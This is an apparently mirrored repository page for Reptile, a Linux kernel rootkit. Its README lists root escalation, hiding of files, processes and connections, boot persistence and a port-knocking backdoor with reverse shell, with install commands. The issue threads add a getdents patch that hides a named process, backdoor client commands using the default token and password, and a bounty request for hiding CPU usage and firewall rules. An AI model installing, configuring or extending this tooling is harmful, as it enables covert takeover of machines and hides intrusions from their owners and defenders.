Giter VIP home page Giter VIP logo

reptile's Introduction

Reptile











Tested on

Debian 9: 4.9.0-8-amd64
Debian 10: 4.19.0-8-amd64
Ubuntu 18.04.1 LTS: 4.15.0-38-generic
Kali Linux: 4.18.0-kali2-amd64
Centos 6.10: 2.6.32-754.6.3.el6.x86_64
Centos 7: 3.10.0-862.3.2.el7.x86_64
Centos 8: 4.18.0-147.5.1.el8_1.x86_64

Features

  • Give root to unprivileged users
  • Hide files and directories
  • Hide processes
  • Hide himself
  • Hide TCP/UDP connections
  • Hidden boot persistence
  • File content tampering
  • Some obfuscation techniques
  • ICMP/UDP/TCP port-knocking backdoor
  • Full TTY/PTY shell with file transfer
  • Client to handle Reptile Shell
  • Shell connect back each X times (not default)

Install

apt install build-essential libncurses-dev linux-headers-$(uname -r)
git clone https://github.com/f0rb1dd3n/Reptile.git
cd Reptile
make menuconfig           # or 'make config' or even 'make defconfig'
make
make install

More details about the installation see Wiki

Uninstall

When you got a sucessfully installation, the way to remove that will be shown in the screen

Usage

See Wiki to usage details. So, read the fucking manual before opening an issue!

Warning

Some functions of this module is based on another rootkits. Please see the references!

References

Thanks

Special thanks to my friend Ilya V. Matveychikov for the KHOOK framework and kmatryoshka loader.

Disclaimer

If you wanna more information, send me an e-mail: [email protected]

reptile's People

Contributors

8887-eth avatar corefx avatar f0rb1dd3n avatar kaimi- avatar maxxor avatar shanginn avatar tehw0lf avatar

Stargazers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

Watchers

 avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar  avatar

reptile's Issues

shorten root escalation code

Hey there, the r00t.c code can be shortened without losing functionality - not sure if that's your style, but I opened a pull request in #5

Also I found some typos and fixed them. By the way, really neat tool you wrote there 👍

lsof: WARNING: unsupported format: /proc/net/tcp

[test@test ~]$ lsof -i -n -P
lsof: WARNING: unsupported format: /proc/net/tcp
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
systemd-n 448 systemd-network 19u IPv4 15693 0t0 UDP 192.168.1.112:68
systemd-r 460 systemd-resolve 12u IPv4 16107 0t0 UDP 127.0.0.53:53
sshd 540 root 4u IPv6 17935 0t0 TCP *:22 (LISTEN)

Tested on Ubuntu 18.04.1 and Debian 9.

install failed

After execute apt-get install linux-headers-$(uname -r),it shows

Reading package lists... Done
Building dependency tree
Reading state information... Done
linux-headers-4.4.0-116-generic is already the newest version (4.4.0-116.140).
0 upgraded, 0 newly installed, 0 to remove and 158 not upgraded.

then I execute ./installer.sh install,it shows

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
writen by: F0rb1dd3n

Compiling... DONE!
Copying binaries to /reptile... DONE!
Installing... insmod: ERROR: could not insert module /reptile/reptile.ko: Invalid module format
ERROR!

Additional information about the system:
Linux version 4.4.0-116-generic (buildd@lgw01-amd64-021) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.9) ) #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018

Compile error

Hi,
Thanks for the beta version. I tried to compile it on Ubuntu 18.04.1 (64 bit) but I got following error:
: In function 'runshell':
:118:2: warning: ignoring return value of 'chdir', declared with attribute warn_unused_result [-Wunused-result]
/tmp/ccsXzAOl.o: In function runshell': :(.text+0x267): undefined reference to openpty'
collect2: error: ld returned 1 exit status
Makefile:12: recipe for target 'reverse' failed
make[1]: *** [reverse] Error 1
make[1]: Leaving directory '/home/test/Reptile/sbin'
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2

error compile centos 7

i use centos 7 for compile the rootkit but i have this error:

Configuring... Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
Can't locate String/Unescape.pm in @INC (@INC contains: /usr/local/lib64/perl5 /usr/local/share/perl5 /usr/lib64/perl5/vendor_perl /usr/share/perl5/vendor_perl /usr/lib64/perl5 /usr/share/perl5 .) at scripts/destringify.pl line 8.
BEGIN failed--compilation aborted at scripts/destringify.pl line 8.
DONE!
Compiling... ERROR!

How to use the Hiding Files Function?

Thanks for your nice work!
I still can't understand how to use the Hiding Files Function.
In readme:
Hide/unhide files contents: kill -51 0 and all content between the tags will be hidden
#
content to hide
#

what i did(use all default setting) :
[root@TEST ~]# cd Reptile
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# # /root/Reptile/README.md #
[root@TEST Reptile]# kill -51 0
[root@TEST Reptile]# kill -51 0 # /root/Reptile/README.md #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]# #
[root@TEST Reptile]# /root/Reptile/README.md
-bash: /root/Reptile/README.md: Permission denied
[root@TEST Reptile]# #
[root@TEST Reptile]# ls
installer.sh libpcap-1.5.3.tar.gz README.md sbin
libpcap-1.5.3 Makefile rep_mod.c scripts
[root@TEST Reptile]#

i just dont't know how to hide the file /root/Reptile/README.md.

Nat

Hi, thank you for this great project! As I read in other topic, it works only in internal network, but I really need it to use with my vps. How I can setup it to work through NAT? Anyone has experience about that? There is no problem with listener, but server can’t connect to me.

P.s ./reverse works fine. Probably something with magic packet, maybe I used it wrong? I run a web server on my vps, it’s possible to send a packet to Apache and trigger reverse connection?

Doesn't Build on 4.17-1

# make
mkdir -p bin
cd sbin && make all
make[1]: Entering directory '/home/user/Desktop/Projects/Reptile/sbin'
gcc -O -W -Wall -o client  pel.c aes.c sha1.c client.c
client.c: In function ‘p_error’:
client.c:48:4: warning: ‘strncat’ specified bound 7 equals source length [-Wstringop-overflow=]
    strncat(error_message, " Error ", 7);
    ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
gcc -O -W -Wall -o shell pel.c aes.c sha1.c shell.c -lutil -DLINUX
gcc -Wall r00t.c -o r00t
strip client shell r00t
cp client shell r00t ../bin
make[1]: Leaving directory '/home/user/Desktop/Projects/Reptile/sbin'
make EXTRA_CFLAGS="-Dx86_64" -C /lib/modules/4.17.0-1-ARCH/build M=/home/user/Desktop/Projects/Reptile modules
make[1]: Entering directory '/usr/lib/modules/4.17.0-1-ARCH/build'
  CC [M]  /home/user/Desktop/Projects/Reptile/rep_mod.o
/home/user/Desktop/Projects/Reptile/rep_mod.c: In function ‘generic_find_sys_call_table’:
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: error: ‘sys_close’ undeclared (first use in this function); did you mean ‘ksys_close’?
   if (syscall_table[__NR_close] == (unsigned long)sys_close)
                                                   ^~~~~~~~~
                                                   ksys_close
/home/user/Desktop/Projects/Reptile/rep_mod.c:397:51: note: each undeclared identifier is reported only once for each function it appears in
make[2]: *** [scripts/Makefile.build:319: /home/user/Desktop/Projects/Reptile/rep_mod.o] Error 1
make[1]: *** [Makefile:1572: _module_/home/user/Desktop/Projects/Reptile] Error 2
make[1]: Leaving directory '/usr/lib/modules/4.17.0-1-ARCH/build'
make: *** [Makefile:7: all] Error 2

Also, from my testing, syscall hooking no longer works in 4.17 so finding a way around that will be fun. Tested the same basic directory hiding code that worked on 4.16.13 on 4.17 and it no longer works.

kernel: general protection fault: 0000 [#1] SMP

Hello,
I was testing the new remote backdoor (it's very nice) when I encountered this kernel crash (it happens quite quickly after using the remote backdoor). I was using Ubuntu 16.04.4 server (on virtualbox) for testing. Similiar crash also happened on Ubuntu 18.04 server.
Details: crash.txt

Predefined Hidden process name

Hi,

I'm trying to add a hardcoded predefined hidden process name

I'm trying this but It doesn't work

#include <linux/string.h>
static const char* phpn = "process";

in both getdents getdents64:

while(off < ret) {
	dir = (void *)kdir + off;
	if((!p && (memcmp(HIDE, dir->d_name, strlen(HIDE)) == 0)) 
            || (p && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) 

            /* Predefined process check  */
            || (p && (strncmp(dir->d_name, phpn, strlen(phpn)) == 0))

            {
		if(dir == kdir) {
			ret -= dir->d_reclen;
			memmove(dir, (void *)dir + dir->d_reclen, ret);
			continue;
		}
		prev->d_reclen += dir->d_reclen;
	} else {
		prev = dir;
	}
	off += dir->d_reclen;
}
if(copy_to_user(dirent, kdir, ret))

kfree(kdir);
return ret;
}

I was going to add a signal switch next to enable and disable the hiding of predefined process(es)

New features

I would love to see these features implemented soon:

Hide CPU usage for specified processes : bounty 0.2btc
Hide iptables rules via netfilter hooks - bounty 0.1btc
Execute command at specified time directly via module (not using third party apps like cron) - bounty 0.1btc

Let me know if you are willing to work on this and i will forward my onion contact info.

Hello,

So, to install on this Centos you just need to run ./setup.sh install. But before you will have to install String::Unescape perl module.

To do that, normally is just do this command or even cpan -i String::Unescape. But if you are having problem with that, you will have to check your perl. Maybe in some configurations, perl is not fully installed.

Try to install (or even reinstall) perl and cpan in your system: yum install perl-devel cpan

Is also recommended: yum update

Originally posted by @f0rb1dd3n in #54 (comment)

setup.sh: offensive sentence [remove proposal].

You have a nice project, and judging by the stars it has, you should be very proud.
However, I propose the complete removal of this line from the setup.sh.

It's very much offensive and without adding any value to your project. Don't you agree?

(está dando bobeira aí amigão, de graça).

Can't remove

Hi, Im a gay ... :)
so, when launch ./installer.sh remove I get this
Uninstalling... rmmod: ERROR: Module rep_mod is in use

Another Info:
On 4.15.0-kali3-amd64
lsmod | grep rep_mod
rep_mod 20480 1

/sbin/modinfo reptile
filename: /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
description: Reptile - A linux LKM rootkit
author: F0rb1dd3n - [email protected]
license: GPL
depends:
retpoline: Y
name: rep_mod
vermagic: 4.15.0-kali3-amd64 SMP mod_unload modversions

rmmod /lib/modules/4.15.0-kali3-amd64/kernel/drivers/PulseAudio/reptile/reptile.ko
rmmod: ERROR: Module reptile is not currently loaded

How to uninstall please ?

TCP and UDP knock not woking

The TCP and UDP knocking in heaven's door is not working for Centos6 box. Only ICMP knocking works. Could you check what the issue might be? Sebd rootkit raw sockets works for Centos6.

headers problem

hi, any idea how to fix this problem?

root@test2:/opt/Reptile # ./setup.sh install

############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n

SELinux config found on system!
Checking SELinux status... clear

Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to magic packets (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port of magic packets (default: 666):
Would you like to config reverse shell each X time? (y/n) (default: n):

Token: hax0r
Backdoor password: s3cr3t
SRC port: 666

TAGs to hide file contents:

#
content to be hidden
#

Configuring... DONE!
Compiling... mkdir -p bin
cd sbin && make reverse cmd
make[1]: Entering directory '/opt/Reptile/sbin'
make[1]: 'reverse' is up to date.
make[1]: 'cmd' is up to date.
make[1]: Leaving directory '/opt/Reptile/sbin'
make -C /lib/modules/4.11.5-200.fc25.x86_64/build M=$PWD
make[1]: *** /lib/modules/4.11.5-200.fc25.x86_64/build: No such file or directory. Stop.
Makefile:2: recipe for target 'all' failed
make: *** [all] Error 2
ERROR!

root@test2:/opt/Reptile # yum install kernel-devel
Redirecting to '/usr/bin/dnf install kernel-devel' (see 'man yum2dnf')

Last metadata expiration check: 2:48:28 ago on Thu Dec 6 15:20:15 2018.
Package kernel-devel-4.13.16-100.fc25.x86_64 is already installed, skipping.
Dependencies resolved.
Nothing to do.
Complete!
root@test2:/opt/Reptile # ls -al /lib/modules/4.11.5-200.fc25.x86_64/
total 14380
drwxr-xr-x. 5 root root 4096 Jun 20 2017 .
drwxr-xr-x. 5 root root 4096 Dec 6 18:04 ..
lrwxrwxrwx. 1 root root 39 Jun 14 2017 build -> /usr/src/kernels/4.11.5-200.fc25.x86_64
-rw-r--r--. 1 root root 185270 Jun 14 2017 config
drwxr-xr-x. 13 root root 4096 Jun 20 2017 kernel
-rw-r--r--. 1 root root 974994 Jun 20 2017 modules.alias
-rw-r--r--. 1 root root 955399 Jun 20 2017 modules.alias.bin
-rw-r--r--. 1 root root 1804 Jun 14 2017 modules.block
-rw-r--r--. 1 root root 7554 Jun 14 2017 modules.builtin
-rw-r--r--. 1 root root 9974 Jun 20 2017 modules.builtin.bin
-rw-r--r--. 1 root root 334323 Jun 20 2017 modules.dep
-rw-r--r--. 1 root root 472573 Jun 20 2017 modules.dep.bin
-rw-r--r--. 1 root root 331 Jun 20 2017 modules.devname
-rw-r--r--. 1 root root 153 Jun 14 2017 modules.drm
-rw-r--r--. 1 root root 110 Jun 14 2017 modules.modesetting
-rw-r--r--. 1 root root 2701 Jun 14 2017 modules.networking
-rw-r--r--. 1 root root 126788 Jun 14 2017 modules.order
-rw-r--r--. 1 root root 486 Jun 20 2017 modules.softdep
-rw-r--r--. 1 root root 403343 Jun 20 2017 modules.symbols
-rw-r--r--. 1 root root 493901 Jun 20 2017 modules.symbols.bin
lrwxrwxrwx. 1 root root 5 Jun 14 2017 source -> build
-rw-------. 1 root root 3550927 Jun 14 2017 System.map
drwxr-xr-x. 2 root root 4096 Jun 14 2017 updates
drwxr-xr-x. 2 root root 4096 Jun 20 2017 vdso
-rwxr-xr-x. 1 root root 7137256 Jun 14 2017 vmlinuz
-rw-r--r--. 1 root root 167 Jun 14 2017 .vmlinuz.hmac
root@test2:/opt/Reptile # uname -a
Linux test2 4.11.5-200.fc25.x86_64 #1 SMP Wed Jun 14 17:17:29 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
root@test2:/opt/Reptile # cat /proc/version
Linux version 4.11.5-200.fc25.x86_64 ([email protected]) (gcc version 6.3.1 20161221 (Red Hat 6.3.1-1) (GCC) ) #1 SMP Wed Jun 14 17:17:29 UTC 2017
root@test2:/opt/Reptile # cat /etc/fedora-release
Fedora release 25 (Twenty Five)

hello

This is a great design, I want to learn it.Can you tell me how to use it in centos7? Thank you! My kernel is centos7 3.10.0-693.el7.x86_64.What should I do?

How to set PORT ?

reptile-client> set PORT TCP=1
[-] wrong parameter!
How to set PORT ?

Memory leak

void shell_execer(struct work_struct *work) {
    	struct shell_task *task = (struct shell_task *)work;
    	char *argv[] = { task->path, "-t", task->ip, "-p", task->port, NULL };

    	exec(argv);
    	if(task) {
		bzero(task->path, strlen(task->path));	 <<-- task->path leak
		bzero(task->ip, strlen(task->ip));       <<-- task->{ip,port} leak
		bzero(task->port, strlen(task->port));	
		kfree(task);
	}
}

Hide other modules

I have an application which processes I can hide with reptile. But it also loads a module which can be found with lsmod and likely other commands. Is there some way to hide the module with reptile?

I test on Centos6.5, Compiling Error

uname -a
Linux root 2.6.32-431.el6.x86_64 #1 SMP Fri Nov 22 03:15:09 UTC 2013 x86_64 x86_64 x86_64 GNU/Linux
Compiling Error
`############################################################################
############################ REPTILE INSTALLER #############################
############################################################################
written by: F0rb1dd3n
SELinux config found on system!
Checking SELinux status... clear

Hide name (will be used to hide dirs/files) (default: reptile):
Auth token to port-knocking (default: hax0r):
Backdoor password (default: s3cr3t):
Tag name that hide file contents (default: reptile):
Source port to port-knocking (default: 666):
TCP port to port-knocking (default: 80):
UPD port to port-knocking (default: 53):

Hide name: reptile
Token: hax0r
Backdoor password: s3cr3t
SRC port: 666
TCP port: 80
UDP port: 53
TAGs to hide file contents:

#
content to be hidden
#

Configuring... DONE!
Compiling... ERROR!
`

Kernel Crash after unloading module

I get a crash after unloading module looks like memory corruption
"BUG: unable to handle kernel paging request at ffffffffc06e69bb"
It has something to do with file content hiding feature it doesn't crash after commenting all related functions
this is on CentOS 7 3.10.0-693.5.2.el7.x86_64

Some bug may cause the crash.

Tested on CentOS 6 x64 (using all the default setting)

  1. set the port-knocking auth token as "hax0r"
    use the client as:
    ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r -w s3cr3t then you will get a shell
    but
    ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0r123 -w s3cr3t then you can still get a shell
    if you try that
    ./reptile_client -l 127.0.0.1 -t 127.0.0.1 -p 5555 -x icmp -k hax0rasuhuicsashai155 -w s3cr3t (right Auth token +some random chars ) the system will crash.
    2.if you set the auth token a bit longer than "hax0r" ,such as "hax0rchsausau" then the port-knocking will not working.
    3.if you set the Hide name a bit longer than "reptile",the port-knocking will not working.

Reptile may have chance to Crash a RHEL6 using all the default setting,sorry a forgot to log the error code.
Good luck!

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.